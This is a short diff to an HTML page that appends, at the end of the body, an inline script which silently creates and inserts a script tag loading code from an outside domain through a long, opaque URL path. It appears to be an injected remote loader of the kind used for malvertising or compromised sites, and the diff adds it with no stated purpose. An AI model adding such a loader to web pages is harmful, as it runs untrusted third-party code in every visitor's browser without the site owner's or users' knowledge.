--- a/index.html
+++ b/index.html
@@ -361,5 +361,17 @@
 
     <!-- JavaScript -->
     <script src="script.js"></script>
+    <script>
+(function(xnebtc){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = xnebtc || {};
+s.src = "\/\/faithfuldifficulty.com\/b.X\/V\/sldfG-la0sYYWrcR\/CeOmS9tuhZhUXlhkFPFTaYR0yNFjnEa4WM\/jlU\/tkNkjQQC2yMeThg\/ymNdgx";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
 </body>
 </html>
